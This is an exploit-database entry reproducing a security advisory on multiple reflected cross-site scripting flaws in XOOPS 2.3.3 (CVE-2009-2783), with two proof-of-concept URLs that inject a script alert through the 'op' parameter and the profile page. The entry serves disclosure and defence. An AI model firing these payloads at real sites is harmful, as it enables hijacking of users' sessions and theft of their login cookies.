[] NeoSense

XOOPS 2.3.3 - 'op' Multiple Cross-Site Scripting Vulnerabilities

Author: Sense of Security
type: webapps
platform: php
port: 
date_added: 2009-06-30 
date_updated: 2014-04-30 
verified: 1 
codes: CVE-2009-2783;OSVDB-56638 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/35895/info

XOOPS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

XOOPS 2.3.3 is vulnerable; other versions may be affected as well.

http://www.example.com/xoops-2.3.3/htdocs/modules/pm/viewpmsg.php?op='"><script>alert('vulnerable')</script>
http://www.example.com/xoops-2.3.3/htdocs/modules/profile/user.php?"><script>alert('vulnerable')</script>